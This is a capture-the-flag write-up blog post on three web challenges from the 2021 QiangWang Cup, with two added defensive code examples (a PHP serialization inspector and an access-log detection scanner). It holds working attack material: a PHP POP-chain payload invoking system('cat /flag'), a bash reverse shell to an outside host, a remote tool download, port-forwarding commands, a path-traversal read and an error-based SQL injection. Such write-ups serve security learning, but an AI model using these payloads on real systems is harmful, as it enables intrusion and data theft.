2021 QiangWang Cup (强网杯)

2021-06-14 21:06:00
ctf - qwb

I'll skip the QiangWang Pioneer (强网先锋) challenges and write up the three challenges I solved that had a relatively high number of solves.

pop_master

Challenge description: I hear you're a master of building POP chains?

160,000 lines of obfuscated code:

Actually @gq had already solved this one at the start; who would have guessed that the code would be re-obfuscated once the target machine was started up...

This challenge is actually quite interesting (if you know how to write a script for it), but I was halfway through tracing it by hand and felt I was nearly there, so I was too lazy to write a script and just kept tracing; it was somewhat hard on the eyes.

At the same time I had no ideas for the other challenges, so I traced from 12:00 to 15:00 and came out with a chain:

<?php

include "class.php";

$o = new cdKBgX();
$b = "phpinfo();//";

$o->IG2X7eS = new guAeB0;
$o->IG2X7eS->LTo0wOs = new MZ2dMV;
$o->IG2X7eS->LTo0wOs->WU6aUWm = new nXKQYP;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd = new r6lSwy;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac = new UW5vkV;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f = new DqoC5G;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X = new TBFTL7;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H = new qoEd8u;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX = new fFEGgM;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL = new rn4PNR;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS = new pRM5G8;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m = new Bwn3ZW;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO = new saCGME;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi = new ubPVyV;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl = new b8WIcp;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp = new q4IoOD;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d = new be3fZl;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac = new x9wgH7;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN = new Upele5;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG = new uQhKsL;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG->RwqayHu = new G6QyEc;
$o->IG2X7eS->LTo0wOs->WU6aUWm->mGpVYwd->q6VMPac->XlZSk2f->qd1Gk6X->z2qMn5H->BmsS1eX->uXVxFLL->TdVPKPS->k6WTa5m->PmYsubO->c449DBi->lgNpoOl->OkOSSwp->Wqcdf7d->NaHb7Ac->IBILkhN->cl73VwG->RwqayHu->Ew9nqoI = new BmAQQY;


echo serialize($o);

Exp:

http://eci-2zeir9lncwqmfgk2txz6.cloudeci1.ichunqiu.com/?pop=O:6:"cdKBgX":1:{s:7:"IG2X7eS";O:6:"guAeB0":1:{s:7:"LTo0wOs";O:6:"MZ2dMV":1:{s:7:"WU6aUWm";O:6:"nXKQYP":1:{s:7:"mGpVYwd";O:6:"r6lSwy":1:{s:7:"q6VMPac";O:6:"UW5vkV":1:{s:7:"XlZSk2f";O:6:"DqoC5G":1:{s:7:"qd1Gk6X";O:6:"TBFTL7":1:{s:7:"z2qMn5H";O:6:"qoEd8u":1:{s:7:"BmsS1eX";O:6:"fFEGgM":1:{s:7:"uXVxFLL";O:6:"rn4PNR":1:{s:7:"TdVPKPS";O:6:"pRM5G8":1:{s:7:"k6WTa5m";O:6:"Bwn3ZW":1:{s:7:"PmYsubO";O:6:"saCGME":1:{s:7:"c449DBi";O:6:"ubPVyV":1:{s:7:"lgNpoOl";O:6:"b8WIcp":1:{s:7:"OkOSSwp";O:6:"q4IoOD":1:{s:7:"Wqcdf7d";O:6:"be3fZl":1:{s:7:"NaHb7Ac";O:6:"x9wgH7":1:{s:7:"IBILkhN";O:6:"Upele5":1:{s:7:"cl73VwG";O:6:"uQhKsL":1:{s:7:"RwqayHu";O:6:"G6QyEc":1:{s:7:"Ew9nqoI";O:6:"BmAQQY":1:{s:7:"UFAlT9K";N;}}}}}}}}}}}}}}}}}}}}}}}&argv=system("cat /flag");//
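From the defender's side, the whole chain above works only because `?pop=` goes straight into unserialize(). The following is an added example (not part of the original write-up or the challenge code): a small Python parser for PHP's serialize() format that lists every class an incoming payload would instantiate and how deeply it nests, so a gateway or unit test can reject payloads the way `unserialize($x, ['allowed_classes' => ...])` would, and additionally cap nesting depth. The two sample payloads are constructed; the first is the first two levels of the chain above.

```python
# Added example: inspect a PHP serialize() payload before unserialize() sees it.
def _parse(buf: bytes, pos: int, depth: int, rep: dict):
    """Parse one value at buf[pos:]; return (python_value, next_pos)."""
    rep["max_depth"] = max(rep["max_depth"], depth)
    tag = chr(buf[pos])
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in "bid":                                 # b:1;  i:42;  d:1.5;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode()
        return {"b": lambda r: r == "1", "i": int, "d": float}[tag](raw), end + 1
    if tag == "s":                                   # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length, start = int(buf[pos + 2:colon]), colon + 2
        if buf[start + length:start + length + 2] != b'";': raise ValueError("bad string")
        return buf[start:start + length].decode("utf-8", "replace"), start + length + 2
    if tag in "aO":                 # a:<n>:{...}   O:<len>:"<Class>":<n>:{...}
        name = None
        if tag == "O":
            colon = buf.index(b":", pos + 2)
            length = int(buf[pos + 2:colon])
            name = buf[colon + 2:colon + 2 + length].decode()
            rep["classes"].append(name)
            pos = colon + 2 + length                 # now at the closing quote
        colon = buf.index(b":", pos + 2)             # ':<n>:{' follows either way
        count, pos, items = int(buf[pos + 2:colon]), colon + 2, {}
        if buf[colon + 1:colon + 2] != b"{": raise ValueError("expected '{'")
        for _ in range(count):
            key, pos = _parse(buf, pos, depth + 1, rep)
            items[key], pos = _parse(buf, pos, depth + 1, rep)
        if buf[pos:pos + 1] != b"}": raise ValueError("expected '}'")
        return ({"__class__": name, "props": items} if name else items), pos + 1
    raise ValueError("unknown type tag %r at %d" % (tag, pos))

def inspect(payload: bytes, allowed_classes=frozenset(), max_depth: int = 8):
    """Accept only if every class is allowed (what unserialize's allowed_classes
    option enforces) and nesting stays within max_depth. Returns (ok, report)."""
    rep = {"classes": [], "max_depth": 0}
    try:
        _, end = _parse(payload, 0, 0, rep)
    except (ValueError, IndexError, UnicodeDecodeError):
        return False, rep                            # malformed: reject outright
    if end != len(payload):
        return False, rep                            # trailing garbage
    bad = [c for c in rep["classes"] if c not in allowed_classes]
    return (not bad and rep["max_depth"] <= max_depth), rep

# Constructed samples: first two levels of the challenge chain above, and a benign array.
POP_PAYLOAD = b'O:6:"cdKBgX":1:{s:7:"IG2X7eS";O:6:"guAeB0":1:{s:7:"LTo0wOs";N;}}'
BENIGN_PAYLOAD = b'a:2:{s:4:"name";s:5:"admin";s:3:"age";i:30;}'
```

With the default empty allow-list the check behaves like `allowed_classes => false`: any `O:` header is rejected, while plain arrays and scalars pass.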

Hard_Penetration

Challenge description: penetration testing is mainly about obtaining privileges; this time, what privileges can you obtain?

The front end is a Shiro deserialization. I happened to be studying Shiro recently; a quick test showed it used the default key, and the URLDNS chain reached dnslog. After that I tried several chains without getting command execution and thought it might be some new chain, but with no leaked source code or other information that seemed unlikely. Later a teammate told me shiro_attack could get straight through, which was crushing.

Checked the flag: no permission to read it. Couldn't pop a shell directly, but wrapping the command in a layer of bash worked. Pop a shell:

bash -c 'bash -i >/dev/tcp/vps/port 2>&1 0>&1'

Uploaded linpeas to gather information; findings:

  • An Apache on internal port 8005 running a CMS
  • The machine has php, python3, etc.
  • The flag only requires www-data privileges to read

Upload ew via PHP:

php -r "file_put_contents('ew',file_get_contents('http://vps/ew_linux_x64'));"

Forward the port:

./ew_linux_x64 -s lcx_listen -l 18888 -e 18889
./ew -s lcx_slave -d vps -e 18889 -f  127.0.0.1 -g 8005

Poking around, it turned out to be baocms, and there is a single copy of the source on GitHub. I spent a long time auditing it, staring at phpunit the whole way; the backdoor had been changed from php://input to php://stdin, which led me to this article: https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/

But I couldn't find a real-world exploitation case, and given this challenge's solve count that didn't seem realistic...

So I re-audited the CMS and finally found an arbitrary file read.

Read the flag directly:

/wap/common/show?templateFile=../../../../../../flag

easyweb

Challenge description: the challenge comes from a penetration test I once did for a friend's project. It is very, very simple, with no new knowledge points; many of the parts that required wild guessing have been removed, but some information gathering is still needed. So~ Be Patient~And have

Nothing difficult in this one; I just got stuck not finding the file-upload point on the second site. First, at http://47.104.136.46/files/ we get the hint:

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

A port scan found another login point on 36842. A quick test showed no filtering at all, so I extracted the password directly with error-based injection:

password=admin&username=admin'or 1=extractvalue(1,concat(0x7e,mid((select password from employee),16)))#

pass:

admin/99f609527226e076d668668582ac4420
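Both this error-based injection and the templateFile traversal in Hard_Penetration leave recognisable traces in a web server's request line, as does the `?pop=O:` payload from pop_master. As an added example (not from the write-up or any of the challenge code), here is a Python scan over constructed access-log lines that URL-decodes the request target and flags those three request shapes. Note that the real injection here travelled in a POST body, which access logs do not record, so the sample places it in the query string purely to show the pattern; the hosts, timestamps and sizes are made up.

```python
# Added example: flag the three request shapes from this write-up in access logs.
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (hosts, times and sizes made up). The injection
# in the write-up travelled in a POST body, which access logs never record, so
# line 2 places it in the query string purely to show the pattern.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jun/2021:12:01:00 +0800] "GET /?pop=O%3A6%3A%22cdKBgX%22%3A1%3A%7B HTTP/1.1" 200 512',
    '10.0.0.5 - - [14/Jun/2021:12:02:00 +0800] "POST /login?username=admin%27or%201%3Dextractvalue(1%2Cconcat(0x7e%2Cversion())) HTTP/1.1" 500 88',
    '10.0.0.5 - - [14/Jun/2021:12:03:00 +0800] "GET /wap/common/show?templateFile=%2E%2E%2F%2E%2E%2F%2E%2E%2Fflag HTTP/1.1" 200 40',
    '10.0.0.9 - - [14/Jun/2021:12:04:00 +0800] "GET /wap/common/show?templateFile=index HTTP/1.1" 200 2048',
]

RULES = {
    # a PHP object header (O:<len>:"...) arriving as a parameter value
    "php_serialized_object_in_query": re.compile(r'[?&][^=&]*=o:\d+:"'),
    # MySQL XML functions abused for error-based extraction
    "error_based_sqli_xml_function": re.compile(r'\b(?:extractvalue|updatexml)\s*\('),
    # two or more ../ segments in any parameter
    "path_traversal": re.compile(r'(?:\.\./){2,}'),
}

def extract_request(line: str) -> str:
    """Pull the request target out of a combined-format log line."""
    m = re.search(r'"(?:GET|POST|PUT|HEAD|DELETE) (\S+) HTTP/', line)
    return m.group(1) if m else ""

def normalize(target: str) -> str:
    """URL-decode twice (catches single and double encoding), then lower-case."""
    return unquote_plus(unquote_plus(target)).lower()

def scan(lines):
    """Return (line_number, rule_name) for every rule that fires on a line."""
    hits = []
    for no, line in enumerate(lines, 1):
        req = normalize(extract_request(line))
        hits.extend((no, name) for name, rx in RULES.items() if rx.search(req))
    return hits

if __name__ == "__main__":
    for no, rule in scan(SAMPLE_LOG):
        print(f"line {no}: {rule}")
```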

I wandered around the site for ages, watching other players hammering it and hoping to catch a free ride on a flag, but no luck. The site was also named easyssrf, which is somewhat misleading; it kept me searching for an SSRF point among the site's few features, and it was a long while before I discovered this wretched site also had a /file path that allowed file upload. A simple bypass of the filter:

After writing a shell, ps -ef showed a JBoss on the internal network, started as root, on port 8006. After forwarding it out with ew, it turned out to be a default interface; I found the exploitation script jexboss on GitHub and went straight for it:



This article was originally published on HhhM's blog; please credit the source when reposting.



CopyRight © 2019-2020 HhhM